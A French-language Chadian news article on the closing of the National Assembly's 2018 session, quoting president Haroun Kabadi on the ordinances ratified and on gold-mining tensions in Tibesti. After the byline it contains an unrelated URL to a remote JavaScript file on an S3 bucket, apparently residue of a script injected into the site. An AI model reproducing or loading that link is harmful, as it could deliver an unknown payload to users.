TCHAD : « L’ASSEMBLÉE NATIONALE A HONORE TOUS SES ENGAGEMENTS STATUTAIRES »

0
597

Clos le mercredi 02 janvier 2019 au palais de la démocratie de Gassi, la 2ème session ordinaire de l’année 2018 de la troisième législature. C’était le président de l’assemblée nationale Haroun Kabadi Jack qui a présidé la cérémonie de ladite session.

Dans son mot de circonstance le numéro deux du pays a souligné que l’année 2019 soit meilleure et prospère   que 2018, par le renforcement de la paix sociale et l’unité nationale. Pour lui, c’est par l’union, la paix et l’entente, qu’ensemble on arrive   à bâtir une nation.

Faisant le bilan de l’année écoulée, le Président de l’assemblée nationale, M. Haroun Kabadi a précisé que pendant la 2eme session Ordinaire 2018, l’assemblée nationale a ratifié 27 ordonnances consacrant les grandes réformes institutionnelles décidées par le forum national inclusif notamment, celle instituant la parité dans la fonction nominative, électives, celle portant attributions, Organisation et Fonctionnement de la Haute Autorité des Medias et de l’Audiovisuel (HAMA).

Selon, KABADi sur le plan de la diplomatie parlementaire, et malgré les difficultés financières, l’assemblée nationale a honoré tous ses engagements statutaires en participant aux sommets et autres activités des organisations parlementaires dont elle est membre.

Au nom d l’assemblée nationale Haroun Kabadi a salué la baisse de la tension sociopolitique née de l’exploitation anarchique des mines d’or du Tibesti, et exhorte le gouvernement à restaurer l’autorité de l’État, en prenant mesures appropriées pour une exploitation rationnelle des ressources souterraines pour le bénéfice   du peuple tchadien en vue d’améliorer les conditions de vie celui-ci.

 

AHMAT MAHAMAT AHMAT

 

https://s3-us-west-2.amazonaws.com/gyrgdd/deext.js

Facebook Comments

LAISSER UN COMMENTAIRE

S'il vous plaît entrez votre commentaire!
S'il vous plaît entrez votre nom ici